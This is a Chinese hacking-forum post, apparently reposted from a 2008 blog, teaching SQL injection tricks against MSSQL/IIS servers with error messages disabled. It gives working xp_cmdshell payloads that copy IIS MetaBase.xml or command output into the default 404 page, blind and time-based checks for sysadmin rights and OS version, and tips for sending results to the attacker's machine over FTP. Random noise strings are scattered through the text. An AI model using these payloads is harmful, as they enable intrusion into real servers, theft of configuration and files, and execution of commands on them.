中国网络渗透测试联盟

标题: 28度的冰注入技巧之(一)——404页面的妙用 [打印本页]
作者: admin    时间: 2012-9-15 14:15
标题: 28度的冰注入技巧之(一)——404页面的妙用
遇到一个sa注入点,mssql错误提示关闭无疑shi让人郁闷的事情。
- t$ W" O9 t& n
. t! g! A' L) y( \0 Q  虽然错误提示关闭也shi可能以列目录,执行命令,但shishi多少就有些不方便。阿D就可能以在错误提示关闭的情况下列目录。4 g8 h& w' s  B5 T# g- \
& f1 _5 b+ ?2 }5 A$ ~4 H
  这里有一个很好的方法,让你得到web目录路径,让你得到服务器上的文件,让你执行命令得到回显。2 e9 v' N5 @2 B4 F6 _' R

, K* M0 B* F( Z/ |8 \  IIS,404页面的默认路径shi C:\Windows\Help\iisHelp\common\404b.htm6 F$ A3 ^5 |; i# N& x. S, C
2 T2 o. |1 h9 `2 m6 ]9 }  f
  得到web路径exec master..xp_cmdshell ’copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm’--* [" m7 G3 Q7 b9 D- u7 F/ {

! L$ j; Q( f" d! v1 ~' o% U. K  ,这shi20003,如果是2000的话,exec master..xp_cmdshell ’copy C:\Winnt\system32 \inetsrv\MetaBase.xml C:\Winnts\Help\iisHelp\common\404b.htm’--,在 MetaBase.xml存着IIS的很多信息。执行上面的语句之后,你再访问一下网站一个不存在的文件或目录,显示的就shiMetaBase.xml 的内容了。
3 p0 r  ^* H5 _7 _  ~3 g
+ _/ N/ i2 O+ I8 @  执行命令得到回显
+ h" p; O) w; O0 J( Z6 G  ^1 w
  通过上面得到web路径的方法,你肯定很容易想到怎么得到回显了吧。 2003,exec master..xp_cmdshell ’ver >C:\Windows\Help\iisHelp\common \404b.htm’--如果是2000,exec master..xp_cmdshell ’ver >C:\Winnt\Help \iisHelp\common\404b.htm’--
" H7 D) G8 `' A
. b# j* B2 x) _1 W  得到文件也shi相同,把文件copy到404b.htm就行了5 z! z# o5 V; g7 u, p% y
' \( D+ c9 v0 c. L1 C* I! L& A/ q
  by 28ice, 2008/6/267 O/ e: b0 C2 l, N. ~& F0 I
8 {* o- r' B  s# q
  摘自 28度的冰: v0 l# U; l% N/ h. c# R
4 Z. z, G0 V& U8 i6 I4 x
  盲注判断权限和操作系统版本
$ |, a; g, f) x* W7 K3 d$ k5 y) d* h% g, C
  首先第一个问题,如果错误提示关闭,怎么判断当前的权限shi否为sysadmin呢?2 z( y3 H7 N& X/ G* F2 G" @( S

) |  u( h2 S) a- c" o  最简单的,可能以用这样的方法:6 V; C: D+ E  Q# H+ S. }: j0 a

0 j6 T5 V0 o( L& {8 v/ I  1=(select IS_SRVROLEMEMBER(’sysadmin’))
! Y% E# w8 u! ^! o& O: E9 l
. ]% V" h. c$ n4 i% R# `0 A  当然,有些情况下,这个方法并不奏效。
/ j% h$ g0 _* }: ~6 n' f4 ]6 p9 m. F5 M4 w
  既然shisa,我们就可能以通过执行命令判断,不过,既然错误提示关闭,那么执行的结果就很不容易拿到。
  a0 a7 C0 T% s1 R% r9 g, K7 ], t" P$ b: Y& x2 w3 ^
  有个3办法可能以解决这个问题
, @3 L7 s- }+ T3 _
/ C) I6 k6 f  `8 m4 n( G( J/ j6 V  a.把执行结果写到404b.htm,具体请看我的上一篇文章; r# q/ q5 Z- `' E4 p! t
6 s) ~5 |  @. ?. r1 S
  b.执行ping 127.1 -n 10,看看页面shi否延迟10秒钟+ ]/ s7 w% c9 R, O& [
9 n8 a; o& b  t: ?. ~. g" U, v  Z# B
  c.如果1433端口可能以连接,那干脆新建个sql登录; f9 t* z/ B7 l0 V/ L; [

, |; B+ Z2 N9 a+ h* K0 r7 Z: B( c6 h* f  d.如果大牛你shi公网Ip,openrowset,或者直接telnet,ftp到你自己的机子,说到这里,ftp还有别的用处,比如,把执行结果写到文件中,然后通过ftp传到你的机子上,这何尝不shi获得执行结果的一个好办法。当然,你可能能要用到ftp的-s参数6 y4 M. U% P. K4 p- _, [

- o* V. @2 @  I+ a( p& G  还有一个问题,怎么判断系统shi2000还shi2003?当然指的shi错误提示关闭的情况下9 y/ R& a1 ]" r" t- N+ ]6 b
  }" u$ `  [! _) z2 r  [- J
  很简单! [) A' v/ |6 R' m) Q8 z

5 d8 x6 X" o6 t! M  执行systeminfo3 V9 p# @5 o. X9 |5 I

8 N% F0 ?+ a6 B8 _& h' a6 n  o  在xp/2003下才有这个命令,这个命令执行大概需要5秒钟时间。如果页面延迟5秒,就可能以进一步断定这shi2003(当然不排除2008的可能能性)。



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2